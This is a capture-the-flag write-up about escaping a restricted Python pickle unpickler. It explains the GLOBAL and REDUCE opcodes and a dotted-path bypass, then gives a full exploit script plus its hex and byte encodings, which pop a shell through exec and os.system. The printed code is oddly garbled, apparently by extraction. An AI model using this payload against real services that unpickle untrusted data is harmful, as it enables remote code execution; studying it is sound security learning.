Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.
Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.
#!/usr/local/bin/python3
import pickle
import io
import sys
= type(__builtins__)
module = module("empty")
empty = empty
empty.empty "empty"] = empty
sys.modules[
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == "empty" and name.count(".") <= 1:
return super().find_class(module, name)
raise pickle.UnpicklingError("e-legal")
= bytes.fromhex(input("Enter hex-encoded pickle: "))
lepickle if len(lepickle) > 400:
print("your pickle is too large for my taste >:(")
else:
SafeUnpickler(io.BytesIO(lepickle)).load()
pickle
is a Python object serialization format. As the docs page loudly
proclaims, it is not secure. Roughly the simplest possible code to pop a
shell (adapted from David
Hamann, who constructs a more realistic RCE) looks like:
class Exploit:
def __reduce__(self): return os.system, ("sh",)
pickle.loads(pickle.dumps(Exploit()))
At a high level, the pickle
format is a stack-based
mini-language. It’s not much of a language in and of itself — it has no
control flow whatsoever and just executes opcodes from start to end.
(Each opcode is one byte and is followed by zero or more arguments,
whose format depends on the opcode. Each argument is either a fixed
number of bytes or an arbitrary number of bytes up to the next newline.)
But, crucially, the pickle
language has opcodes
GLOBAL
, which can look up any global, and
REDUCE
, which can call any callable Python object. Using
these two opcodes, you can call just about any Python built-in function
with any conceivable argument — for example, os.system
with
a command to pop a shell. This is why pickle
is completely
insecure by default.
However, the behavior of opcode GLOBAL
above is
determined by Unpickler.find_class
, which can be overridden
to restrict unpickling. DiceCTF 2022 actually had a pickle challenge
with the most restricted unpickler imaginable:
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
raise pickle.UnpicklingError(f"HACKING DETECTED")
I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.
Well, in this challenge, find_class
is still pretty
restricted. We are only allowed to access properties of the
empty
module, and if we copy the bit of code that creates
empty
into a REPL to investigate, it doesn’t seem like
there are that many:
>>> dir(empty)
'__doc__', '__loader__', '__name__', '__package__', '__spec__', 'empty'] [
But this is misleading; empty
has a few properties that
every Python object does by dint of inheritance, which are the same
properties we use in the standard jailbreaks for
eval(..., {"__builtins__": {}})
. For example:
>>> empty.__class__
<class 'module'>
>>> empty.__class__.__base__
<class 'object'>
>>> empty.__class__.__base__.__subclasses__()
<class 'type'>, ... (a lot of subclasses I will omit here)] [
To have a target to aim for, I’ll just grab the headlining quote in Finding Python3 built-ins:
for t in ().__class__.__base__.__subclasses__() if t.__name__ == 'Sized'][0].__len__.__globals__['__builtins__'] [t
If we get that far, we’re home free — we can grab exec
or eval
, or __import__
the os
module, or pull off many other kinds of mischief.
Now, the filtered list comprehension is probably out of our reach to
express in pickle code, so we’ll just try to get our pickle to do the
following (135 is the index of Sized
on the server’s list
of __subclasses__
, which I found by looking locally and
then just trying nearby numbers against the server):
empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']
This is still a little trickier than it sounds. Some resources like
“Can
I safely unpickle untrusted data?” makes it sound like we can grab
attributes willy-nilly, but getattr
is not actually
something we have available as a native pickle opcode (without literally
grabbing the getattr
function from GLOBAL
,
which is blocked by the overridden find_class
). Instead,
pickle
just has opcodes for setattr
and
setitem
. From the design standpoint of pickle
,
this makes sense since opcodes are meant to help you construct data, not
access it; you shouldn’t need to get attributes of the data you
constructed since you probably also put it there. But it makes our job a
little more annoying.
The key insight that allows us to get over this hurdle is that the
GLOBAL
opcode uses getattr
internally. What’s
more, in pickle protocol 4, GLOBAL
supports dotted paths
(which is why the challenge checks name.count(".")
):
calling GLOBAL
with foo
and
"bar.baz"
as arguments will get you
foo.bar.baz
. The challenge tries to limit us to one level
of getattr
with the check that
name.count(".") <= 1
, but because we can use the
SETITEM
opcode to set items onto
empty.__dict__
, we can stash intermediate results into
empty
and then go through empty
to access
their attributes with a dotted path. That is, given some value
foo
that we want to get the bar
attribute of,
we could write pickle opcodes that roughly do the following:
'foo'] = foo
empty.__dict__[ empty.foo.bar
(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)
To put the full exploit, we just need to look up the opcodes we need
and concatenate them together with the desired arguments. Each opcode is
available as a constant from the pickle
module, so we can
write pretty literate code. The opcodes we use below are:
PROTO
, which takes a byte as an argument and indicates that the pickle has that protocol versionGLOBAL
, which takes two newline-delimited stringsUNICODE
, which takes a newline-delimited string and pushes it onto the stackSETITEM
, which popsc, b, a
from the stack, setsa[b] = c
, and pushesa
backEMPTY_TUPLE
, which pushes a length-0 tupleREDUCE
, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stackBININT1
, which takes a byte as an argument and pushes it as an integerTUPLE1
, which constructs a length-1 tuple from the top of the stackPOP
, which pops an element off the stack and discards it (not really necessary)STOP
, which concludes the program (not really necessary)
Here’s my full exploit:
import pickle
= (
body # Set the protocol version so that dotted paths are allowed
+ b'\x04' +
pickle.PROTO
# Push empty.__dict__. This will stay on the stack until the end.
# We will call SETITEM on it.
+ b'empty\n__dict__\n' +
pickle.GLOBAL
# empty.a = empty.__class__.__base__ = object
+ b'a\n' +
pickle.UNICODE + b'empty\n__class__.__base__\n' +
pickle.GLOBAL +
pickle.SETITEM
# empty.b = empty.a.__subclasses__() = object.__subclasses__()
+ b'b\n' +
pickle.UNICODE + b'empty\na.__subclasses__\n' +
pickle.GLOBAL +
pickle.EMPTY_TUPLE +
pickle.REDUCE +
pickle.SETITEM
# empty.c = empty.b[135] = Sized
+ b'c\n' +
pickle.UNICODE + b'empty\nb.__getitem__\n' +
pickle.GLOBAL # 135 was the value that worked against the remote server, but is not by
# any means constant between Python versions. I ran the snippet earlier to
# get the value on my versions of Python and then tweaked it in this
# exploit until it worked. Wrong values will just say "Cannot get
# attribute".
+ bytes([135]) +
pickle.BININT1 +
pickle.TUPLE1 +
pickle.REDUCE +
pickle.SETITEM
# empty.d = empty.c.__len__
+ b'd\n' +
pickle.UNICODE + b'empty\nc.__len__\n' +
pickle.GLOBAL +
pickle.SETITEM
# empty.e = empty.d.__globals__
+ b'e\n' +
pickle.UNICODE + b'empty\nd.__globals__\n' +
pickle.GLOBAL +
pickle.SETITEM
# empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
+ b'f\n' +
pickle.UNICODE + b'empty\ne.__getitem__\n' +
pickle.GLOBAL + b'__builtins__\n' +
pickle.UNICODE +
pickle.TUPLE1 +
pickle.REDUCE +
pickle.SETITEM
# we're ready for the finale; pop empty.__dict__
# (not that we really need to)
+
pickle.POP
# pop a shell:
# empty.f.__getitem__("exec")('__import__("os").system("sh")')
+ b'empty\nf.__getitem__\n' +
pickle.GLOBAL + b'exec\n' +
pickle.UNICODE +
pickle.TUPLE1 +
pickle.REDUCE + b'__import__("os").system("sh")\n' +
pickle.UNICODE +
pickle.TUPLE1 +
pickle.REDUCE
# we don't really need this either
pickle.STOP
)# pickle.loads(body)
# pickletools.dis(body)
print(body.hex())
The hexed exploit is:
800463656d7074790a5f5f646963745f5f0a56610a63656d7074790a5f5f636c6173735f5f2e5f5f626173655f5f0a7356620a63656d7074790a612e5f5f737562636c61737365735f5f0a29527356630a63656d7074790a622e5f5f6765746974656d5f5f0a4b8785527356640a63656d7074790a632e5f5f6c656e5f5f0a7356650a63656d7074790a642e5f5f676c6f62616c735f5f0a7356660a63656d7074790a652e5f5f6765746974656d5f5f0a565f5f6275696c74696e735f5f0a8552733063656d7074790a662e5f5f6765746974656d5f5f0a56657865630a8552565f5f696d706f72745f5f28226f7322292e73797374656d2822736822290a85522e
The bytestring is:
b'\x80\x04cempty\n__dict__\nVa\ncempty\n__class__.__base__\nsVb\ncempty\na.__subclasses__\n)RsVc\ncempty\nb.__getitem__\nK\x87\x85RsVd\ncempty\nc.__len__\nsVe\ncempty\nd.__globals__\nsVf\ncempty\ne.__getitem__\nV__builtins__\n\x85Rs0cempty\nf.__getitem__\nVexec\n\x85RV__import__("os").system("sh")\n\x85R.'
Once we pop a shell, we can cd /
and
cat flag.txt
and we’re done!
actf{__i_miss_kmh11_pyjails__}